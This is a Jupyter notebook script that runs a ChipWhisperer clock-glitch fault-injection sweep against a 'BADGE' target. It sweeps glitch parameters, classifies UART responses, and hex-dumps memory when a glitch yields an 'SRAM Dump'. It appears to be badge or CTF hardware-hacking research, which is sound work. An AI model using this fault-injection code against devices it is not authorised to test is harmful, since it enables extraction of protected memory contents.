<p><strong style="font-size:24px;">The Badge Fault Injection Script</strong></p>

In [1]:
import chipwhisperer

%matplotlib notebook
import matplotlib.pylab as plt

SCOPETYPE = 'OPENADC'
PLATFORM = 'BADGE'
CRYPTO_TARGET = 'NONE'

import chipwhisperer as cw
scope = cw.scope()
target = cw.target(scope)

%run ../Setup_Scripts/Setup_Generic.ipynb

scope.default_setup()
scope.clock.clkgen_freq = 24E6 #Tune to optimze glitch size
target.baud = 115200 #match to target UART


(ChipWhisperer Other WARNING|File __init__.py:69) ChipWhisperer update available! See https://chipwhisperer.readthedocs.io/en/latest/installing.html for updating instructions


INFO: Found ChipWhisperer😍


In [2]:
# Test writing to the target
target.flush()
target.write("m")
time.sleep(0.3)  #wait for response
# Reading from the target
response = target.read()
print(f"Response length: {len(response)}")
print(response)


Response length: 0



In [5]:
import chipwhisperer.common.results.glitch as glitch
gc = glitch.GlitchController(groups=["glitch", "reset", "locked", "normal"], parameters=["width", "offset", "ext_offset"])
#gc.display_stats()

scope.glitch.clk_src = "clkgen" # set glitch input clock

scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch

scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called
scope.glitch.arm_timing = 'before_scope'

scope.adc.basic_mode = 'falling_edge'

scope.io.tio4 = 'high_z'

scope.io.glitch_lp = True
scope.io.glitch_hp = True

In [ ]:
import chipwhisperer.common.results.glitch as glitch 
from tqdm.notebook import trange 
import struct
import re

# Define the ANSI color codes
RED = '\033[91m'
GREEN = '\033[92m'
RESET = '\033[0m'

def read_response(max_bytes=100000, timeout=2000):
    
    response = ''
    start_time = time.time()
    while (time.time() - start_time) < 2:  # 50ms timeout
        chunk = target.read(1024, timeout=50)
        if not chunk:
            break
        response += chunk

    return response


def reboot_flush():           
    global rebootFlag
    scope.io.nrst = False # Reset board
    time.sleep(0.02)
    scope.io.nrst = "high_z" # Rlease reset
    time.sleep(0.02)
    rebootFlag = True

    response = ''
    while True:
        response += target.read(10, timeout=20)
        if '>' in response:
            break;

def hex_dump(buffer):
    if isinstance(buffer, str):
        buffer = buffer.encode()  # Convert string to bytes if necessary
    
    hex_chars_per_line = 16
    for i in range(0, len(buffer), hex_chars_per_line):
        chunk = buffer[i:i + hex_chars_per_line]
        hex_values = ' '.join(f'{byte:02x}' for byte in chunk)
        printable_chars = ''.join((chr(byte) if 32 <= byte <= 126 else '.') for byte in chunk)
        address = f'{i:08x}'
        print(f'{address}: {hex_values:<39}  {printable_chars}')

# Adding a reset function
def reset_scope():
    scope.io.glitch_hp = False
    scope.io.glitch_lp = False
    scope.io.glitch_hp = True
    scope.io.glitch_lp = True
    scope.io.nrst = "high_z"

print("Working...") 
scope.glitch.ext_offset = 1

# width and offset numbers have a very different meaning for Husky vs Lite/Pro; 
# see help(scope.glitch) for details 
gc.set_range("width", -45, -45) 
gc.set_range("offset", 1, 45)
#gc.set_range("ext_offset", 22893, 22895)
gc.set_range("ext_offset", 22773, 22775)
gc.set_global_step(.5) 
scope.glitch.repeat = 6
scope.adc.timeout = 0.3 

global rebootFlag

reboot_flush()

gcnt = 0

rebootFlag = False

expected_normal_response_length  = 13     # number of bytes in expected response
expected_menu_response_length    = 156    # sometimes the read grabs the menu bytes even though read is set to only 24
expected_success_response_length = 350    # just a number larger than a normal/menu response

glitch_values = list(gc.glitch_values())
print("Number of elements to loop through:", len(glitch_values))

while True:

    glitch_values = list(gc.glitch_values())

    for glitch_setting in gc.glitch_values(): 

        scope.glitch.offset = glitch_setting[1] 
        scope.glitch.width = glitch_setting[0]
        scope.glitch.ext_offset = glitch_setting[2]

        parameters = {
            'width': scope.glitch.width,
            'offset': scope.glitch.offset,
            'ext_offset': scope.glitch.ext_offset  # assuming you want to track this too
        }
        
        ##wait for menu ready signal
        while scope.io.tio_states[4 - 1] == 0:
            True
            
        target.flush()
        
        target.write("m") # this should fire trigger signal on target 
        scope.arm() ## wait for tio4 low to high    
        # Capture and check for timeout   
        scope.capture()
        
        response = read_response(max_bytes=20000, timeout=10)
        
        print(len(response))
        
        if len(response) < expected_normal_response_length or (scope.io.tio_states[4 - 1] == 0 and len(response) <= expected_menu_response_length): # if true we didn't get enough bytes, this happens randomly sometimes...
            print("Timeout...")
            print("\t", scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
            print("\t", f"Response len: {RED}{len(response)}{RESET}")
            #hex_dump(response)
            gc.add("locked", parameters)
            reset_scope()  # Reset the scope on timeout
            # Update plot for timeout
            #plt.plot(scope.glitch.width, scope.glitch.offset, 'xr', alpha=1)  # 
            #fig.canvas.draw()
            reboot_flush() 
                 
        elif 'Device Revision' in response:
            print("Reset Detected!")
            print("\t", scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
            print("\t", f"Response len: {RED}{len(response)}{RESET}")
            #hex_dump(response)
            gc.add("reset", parameters)
            #plt.plot(scope.glitch.width, scope.glitch.offset, 'sr', alpha=1)
            #fig.canvas.draw()
            reset_scope()
            reboot_flush()
            
        elif len(response) > expected_menu_response_length:
            print(f"Glitch Detected! Response length {len(response)}")  
            print("\t", gcnt + 1, scope.glitch.ext_offset)
    
            gcnt = gcnt + 1
            gc.add("glitch", parameters) 
            
            #plt.plot(scope.glitch.width, scope.glitch.offset, 'og', alpha=1)
            #fig.canvas.draw()
            reset_scope()
           
            if len(response) > expected_success_response_length:
                print("\tSuccess! SRAM Dump!")
                print("\t🐙\r\n", end="")
                hex_dump(response)
                print("Exiting...")
                raise SystemExit   

print("Exit")

Working...
